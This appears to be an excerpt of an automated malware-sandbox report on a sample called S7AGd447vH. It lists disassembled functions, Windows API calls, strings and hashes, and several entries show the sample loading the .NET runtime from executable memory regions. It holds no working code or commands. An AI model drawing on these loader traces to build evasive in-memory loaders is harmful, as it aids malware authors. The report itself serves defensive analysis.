                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: f937f6d1b54b543fc24e0c382ca6138a2ca5fa36c124f1f114eabe275f8b2ac5
                                                                                  • Instruction ID: 6d4f42ad6065432617f01940889ce0319a914ae83ddce40e5b72c6baea482f08
                                                                                  • Opcode Fuzzy Hash: f937f6d1b54b543fc24e0c382ca6138a2ca5fa36c124f1f114eabe275f8b2ac5
                                                                                  • Instruction Fuzzy Hash: 6CF06272908304AB8634FB65E4CAC8777E9EA09310354085FF01DD7650C738FCC18AAC
                                                                                  Function 7FE43663 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(mscoree.dll,00000000,02263E58,00000000,00033400,?,7FE43722,?), ref: 7FE43671
                                                                                    • Part of subcall function 7FE434AF: GetProcAddress.KERNEL32(?,CorBindToRuntime), ref: 7FE434E6
                                                                                    • Part of subcall function 7FE434AF: GetProcAddress.KERNEL32(?,GetCORVersion), ref: 7FE434F1
                                                                                    • Part of subcall function 7FE434AF: GetProcAddress.KERNEL32(?,GetRequestedRuntimeInfo), ref: 7FE434FC
                                                                                    • Part of subcall function 7FE434AF: wcscmp.NTDLL ref: 7FE43525
                                                                                    • Part of subcall function 7FE434AF: wcscmp.NTDLL ref: 7FE43544
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$wcscmp$LibraryLoad
                                                                                  • String ID: mscoree.dll$v2.0.50727$v4.0.30319
                                                                                  • API String ID: 3438369058-518887049
                                                                                  • Opcode ID: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
                                                                                  • Instruction ID: d3d31f5be46057649fb9b99c077c88d5e31ad3076790e6f087b55fb3520f1749
                                                                                  • Opcode Fuzzy Hash: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
                                                                                  • Instruction Fuzzy Hash: 26F0A972902325BFF71296657D41EFB75ACCB411D4F1021ADF901A2240D6B09E0076B5
                                                                                  Function 7FE31BC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,7FE319C5,00000000), ref: 7FE31BD6
                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 7FE31BE2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_7fe31000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                  • API String ID: 1646373207-3024904723
                                                                                  • Opcode ID: fa89db43dd185a1453fcf4f790fbcd5a175520637a84c9a2fa416bbfb15f58e2
                                                                                  • Instruction ID: 54fe31d5977995978b315a9fd433e02c4f518c0bef640df39cf22da13bcb4d8d
                                                                                  • Opcode Fuzzy Hash: fa89db43dd185a1453fcf4f790fbcd5a175520637a84c9a2fa416bbfb15f58e2
                                                                                  • Instruction Fuzzy Hash: E6E03039E0030AAFDB01CBA5CA0DF9DB6BDAF4526AB604159A805D6000E735D614EA10
                                                                                  Function 7FE43629 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(7FE436C9,CorBindToRuntime), ref: 7FE43635
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: CorBindToRuntime$v2.0.50727$wks
                                                                                  • API String ID: 190572456-3347351501
                                                                                  • Opcode ID: 1c952edf47f5d967c480487307a17a198ad8a415b3d2b670942881798b77bc7c
                                                                                  • Instruction ID: 0c5fc14341107e3be1e4a3b148c5bf2aaf3a514f9beb35c349b5f130446ce887
                                                                                  • Opcode Fuzzy Hash: 1c952edf47f5d967c480487307a17a198ad8a415b3d2b670942881798b77bc7c
                                                                                  • Instruction Fuzzy Hash: FCD02E32308323ABD6119E657C00FBABBA6AF402C0F00372DBE80EC124C341D035A38A
                                                                                  Function 7FE31064 Relevance: 6.5, APIs: 1, Strings: 3, Instructions: 456COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_7fe31000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: $$$combase.dll
                                                                                  • API String ID: 2221118986-1187780485
                                                                                  • Opcode ID: a92cfde426eaf275d4cdb4ff5bbffa1fe7b5514eabfb562f5d1dbc9aa72339ae
                                                                                  • Instruction ID: 073b19536da68552c2ef516f0e74b594634c8d8f7233081d7479257ca9af4b1c
                                                                                  • Opcode Fuzzy Hash: a92cfde426eaf275d4cdb4ff5bbffa1fe7b5514eabfb562f5d1dbc9aa72339ae
                                                                                  • Instruction Fuzzy Hash: D702F724C087C599DB168A78805D3EDBFF29F43228F9986CDC4D31BA97C27E6249D352
                                                                                  Function 7FE411B0 Relevance: 6.5, APIs: 1, Strings: 3, Instructions: 456COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: $$$DbgUserBreakPoint
                                                                                  • API String ID: 2221118986-3284380563
                                                                                  • Opcode ID: f41bbd2ad5d204c1819bf145e7111d98b5bb1373749e436e17a0d8b8869e6680
                                                                                  • Instruction ID: bbb4ff28fefea5246b1a415e85eba509f200322f977f728c9ce93df5bd6fac56
                                                                                  • Opcode Fuzzy Hash: f41bbd2ad5d204c1819bf145e7111d98b5bb1373749e436e17a0d8b8869e6680
                                                                                  • Instruction Fuzzy Hash: 8F02F3148097C499DF138A68A0503FDBFF25F43228F28A68DE4E34B6E7C27D6249D356
                                                                                  Function 004220AE Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0042217E
                                                                                  • _free.LIBCMT ref: 004221A7
                                                                                  • SetEndOfFile.KERNEL32(00000000,0041E595,00000000,0041E82C,?,?,?,?,?,?,?,0041E595,0041E82C,00000000), ref: 004221D9
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0041E595,0041E82C,00000000,?,?,?,?,00000000), ref: 004221F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 1547350101-0
                                                                                  • Opcode ID: f105e4f7330317cfd069ab92d2c1c7aad1e63d6a5496295be2fccd10389ca4c9
                                                                                  • Instruction ID: 293562508d3b75ceed18384fa446975e2651337f910029f718001614b77a88c4
                                                                                  • Opcode Fuzzy Hash: f105e4f7330317cfd069ab92d2c1c7aad1e63d6a5496295be2fccd10389ca4c9
                                                                                  • Instruction Fuzzy Hash: 8A412832700611BBDB106FA9DD42FEE3775AF44324F54011BF628A72A1EABCC991876D
                                                                                  Function 0041B854 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004130D7: _free.LIBCMT ref: 004130E5
                                                                                    • Part of subcall function 0041C82B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00421C20,?,00000000,00000000), ref: 0041C8CD
                                                                                  • GetLastError.KERNEL32 ref: 0041B8BC
                                                                                  • __dosmaperr.LIBCMT ref: 0041B8C3
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B902
                                                                                  • __dosmaperr.LIBCMT ref: 0041B909
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                  • String ID:
                                                                                  • API String ID: 167067550-0
                                                                                  • Opcode ID: 2e3881f2e11957972756898f843b487a2f604e9d9679e774f7dbafeea38e4a0c
                                                                                  • Instruction ID: 095d4c43ec0daf9afac1e08a9d3b20872156a4b645d275253ab2c1db03167179
                                                                                  • Opcode Fuzzy Hash: 2e3881f2e11957972756898f843b487a2f604e9d9679e774f7dbafeea38e4a0c
                                                                                  • Instruction Fuzzy Hash: D721D8B1600205AF9B207F66CC819EBB79CEF00378710452AFA2997351D738DDC197D4
                                                                                  Function 00417942 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,?,00413055,?,?,?,?,00413CC2,?), ref: 00417947
                                                                                  • _free.LIBCMT ref: 004179A4
                                                                                  • _free.LIBCMT ref: 004179DA
                                                                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00413055,?,?,?,?,00413CC2,?), ref: 004179E5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_free
                                                                                  • String ID:
                                                                                  • API String ID: 2283115069-0
                                                                                  • Opcode ID: 15ae55d0fabae9737d6236069fb70904a2702244869e19290368a068439bb181
                                                                                  • Instruction ID: f44886405bcd11b52bc5f5453c8bd595cdc0622e60251feab63c3b55ae40c742
                                                                                  • Opcode Fuzzy Hash: 15ae55d0fabae9737d6236069fb70904a2702244869e19290368a068439bb181
                                                                                  • Instruction Fuzzy Hash: 5D11C67221C2416AA71127765CC6DEB29798BC1378B25023BF128962E1EE3D8CDA412D
                                                                                  Function 00417A99 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,?,00413C5C,00417077,?,?,0041614E), ref: 00417A9E
                                                                                  • _free.LIBCMT ref: 00417AFB
                                                                                  • _free.LIBCMT ref: 00417B31
                                                                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00413C5C,00417077,?,?,0041614E), ref: 00417B3C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_free
                                                                                  • String ID:
                                                                                  • API String ID: 2283115069-0
                                                                                  • Opcode ID: c380182e142c2e1c87376308911ac707daa6a03f36107a6266d6d900337f9e4f
                                                                                  • Instruction ID: 3ec2869ed4035905108020d6bb154c1a5af35f7ef893f3068d235d6d6968e62c
                                                                                  • Opcode Fuzzy Hash: c380182e142c2e1c87376308911ac707daa6a03f36107a6266d6d900337f9e4f
                                                                                  • Instruction Fuzzy Hash: FC11C63120C6017A971167769CC6DEF29B98BC13B8725023BF128861E1EE2D9CD6412C
                                                                                  Function 004181F5 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,004182F1,00000000,?,0041EBE0,00000000,00000000,004182F1,?,?,00000000,00000000,00000001), ref: 0041820B
                                                                                  • GetLastError.KERNEL32(?,0041EBE0,00000000,00000000,004182F1,?,?,00000000,00000000,00000001,00000000,00000000,?,004182F1,00000000,00000104), ref: 00418215
                                                                                  • __dosmaperr.LIBCMT ref: 0041821C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 2398240785-0
                                                                                  • Opcode ID: 4e38e9137bc5694164b1a41a536ff43004c579aa846234ace767dc9fd853d331
                                                                                  • Instruction ID: aac1492a34aeb4a7712834e58cbac2e5695d98ccf746a4b9b3de964524158273
                                                                                  • Opcode Fuzzy Hash: 4e38e9137bc5694164b1a41a536ff43004c579aa846234ace767dc9fd853d331
                                                                                  • Instruction Fuzzy Hash: A3F06232600515BB8B215FA2DC089DBFF69FF443A0314856AF518D7110DF35D8A2D7D4
                                                                                  Function 0041818C Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,004182F1,00000000,?,0041EC55,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 004181A2
                                                                                  • GetLastError.KERNEL32(?,0041EC55,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,004182F1,00000000,00000104,?), ref: 004181AC
                                                                                  • __dosmaperr.LIBCMT ref: 004181B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 2398240785-0
                                                                                  • Opcode ID: 279edd8d4ece87b1d3a8637269c62e89e05bb7f154ad503b0c6df0af7cc3e302
                                                                                  • Instruction ID: cbaf03c252dadb21657f22ac35acf13070849d1c927eb08493f9538ca41eeb8d
                                                                                  • Opcode Fuzzy Hash: 279edd8d4ece87b1d3a8637269c62e89e05bb7f154ad503b0c6df0af7cc3e302
                                                                                  • Instruction Fuzzy Hash: F4F04B32700115BB8A211BA2CC0889BFFA9FF453A0300852AF91D96520DF35E9A297D8
                                                                                  Function 004225D5 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WriteConsoleW.KERNEL32(00403FD0,00000000,0042F8A8,00000000,00403FD0,?,0041FA1F,00403FD0,00000001,00403FD0,00403FD0,?,0041927C,00000000,?,00403FD0), ref: 004225EC
                                                                                  • GetLastError.KERNEL32(?,0041FA1F,00403FD0,00000001,00403FD0,00403FD0,?,0041927C,00000000,?,00403FD0,00000000,00403FD0,?,004197D0,00403FD0), ref: 004225F8
                                                                                    • Part of subcall function 004225BE: CloseHandle.KERNEL32(FFFFFFFE,00422608,?,0041FA1F,00403FD0,00000001,00403FD0,00403FD0,?,0041927C,00000000,?,00403FD0,00000000,00403FD0), ref: 004225CE
                                                                                  • ___initconout.LIBCMT ref: 00422608
                                                                                    • Part of subcall function 00422580: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004225AF,0041FA0C,00403FD0,?,0041927C,00000000,?,00403FD0,00000000), ref: 00422593
                                                                                  • WriteConsoleW.KERNEL32(00403FD0,00000000,0042F8A8,00000000,?,0041FA1F,00403FD0,00000001,00403FD0,00403FD0,?,0041927C,00000000,?,00403FD0,00000000), ref: 0042261D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                  • String ID:
                                                                                  • API String ID: 2744216297-0
                                                                                  • Opcode ID: 55b695b80b4adcc94f6d78668d328e8ccb605adb0f24a91616ec9c01678fe125
                                                                                  • Instruction ID: 269b5ab5e027013f0b97368f70e56529989ea90365c6b82d1693adf48919afa4
                                                                                  • Opcode Fuzzy Hash: 55b695b80b4adcc94f6d78668d328e8ccb605adb0f24a91616ec9c01678fe125
                                                                                  • Instruction Fuzzy Hash: 78F03036601124BBCF321FA1EC14E8E3F26FF087A4F854529FB1895130CA768860DB98
                                                                                  Function 00402750 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: <$PDu
                                                                                  • API String ID: 0-475385775
                                                                                  • Opcode ID: 12c6dc6ae46c2f0de1b8412df752af01c1dba0508c250d1472588638f7586fef
                                                                                  • Instruction ID: 9945669b60b7c6661290a091ce000a38be6731a15c1dc6d6bc78aa5e9493bb7a
                                                                                  • Opcode Fuzzy Hash: 12c6dc6ae46c2f0de1b8412df752af01c1dba0508c250d1472588638f7586fef
                                                                                  • Instruction Fuzzy Hash: 9D5178716143049BDB18AF38CA4979E7BE1AF89308F50562EFC45672C1CBB9C5848BCA
                                                                                  Function 0041C3B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041C15E: GetOEMCP.KERNEL32(00000000,0041C3D0,?,?,00413CC2,00413CC2,?), ref: 0041C189
                                                                                  • _free.LIBCMT ref: 0041C42D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID: P1Z
                                                                                  • API String ID: 269201875-3726526714
                                                                                  • Opcode ID: 254bf34c1be40f8779cd65d4814556e2b5b549f5670f27e9a3ac313cb2698e8b
                                                                                  • Instruction ID: 401053c1d18ecf400929803d4b8928ce90f3dcbf94a49c828f1befedf9997fa1
                                                                                  • Opcode Fuzzy Hash: 254bf34c1be40f8779cd65d4814556e2b5b549f5670f27e9a3ac313cb2698e8b
                                                                                  • Instruction Fuzzy Hash: 1731E132904209AFDB11DFA9DC81AEB7BF4EF44318F10406AF810972A1EB39DD80CB58
                                                                                  Function 00419B65 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID: \.C$`.C
                                                                                  • API String ID: 269201875-3636064301
                                                                                  • Opcode ID: 229bc69ea90fbf934cba984787b794dcaaf35498c44fb19e8a3722b176cf72a0
                                                                                  • Instruction ID: 23df0ea54c82c44fe95a6217dd9d1d59ab36573812ef85ea252388b0da85f7ac
                                                                                  • Opcode Fuzzy Hash: 229bc69ea90fbf934cba984787b794dcaaf35498c44fb19e8a3722b176cf72a0
                                                                                  • Instruction Fuzzy Hash: B011B1715083029ED7209F2AE891BD3B7E4BB15758F20802FF58A87281E779ECC1879C
                                                                                  Function 7FE43586 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(7FE436AF,CLRCreateInstance), ref: 7FE4359C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: CLRCreateInstance$v4.0.30319
                                                                                  • API String ID: 190572456-303888047
                                                                                  • Opcode ID: ee11bf2f7cd5b6165e65e907bb3e342fbf2494dd9a6e8d7db98cfb98964fecc3
                                                                                  • Instruction ID: 4049353a07a8ef2bd98e8e00e1d987354befd7e798cdf1343371d813bbfb0654
                                                                                  • Opcode Fuzzy Hash: ee11bf2f7cd5b6165e65e907bb3e342fbf2494dd9a6e8d7db98cfb98964fecc3
                                                                                  • Instruction Fuzzy Hash: 3F215E70B04246EFEB10CF95E945FBE7BB9EF84255B10529CB806EB210D771EA11EB20
                                                                                  Function 004111F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00411236
                                                                                  • ___raise_securityfailure.LIBCMT ref: 0041131D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                  • String ID: $C
                                                                                  • API String ID: 3761405300-4195116304
                                                                                  • Opcode ID: 80f6249f06b426e1337c46bdc1e1420712c79efacf94ae91467b1a2988782b37
                                                                                  • Instruction ID: 62c722c446441bb4af656825ad5ffe4e224cb7c18a78e535eed0a2c18ff6a66e
                                                                                  • Opcode Fuzzy Hash: 80f6249f06b426e1337c46bdc1e1420712c79efacf94ae91467b1a2988782b37
                                                                                  • Instruction Fuzzy Hash: 2E21F0B9500200EEE718CF15FEA5B847BE4BB48304F10603AE608CA3B0E7F856818F4C
                                                                                  Function 009102A2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(7FE453B0), ref: 009102B0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708854930.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_910000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: v2.0.50727$v4.0.30319
                                                                                  • API String ID: 1029625771-3789287155
                                                                                  • Opcode ID: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
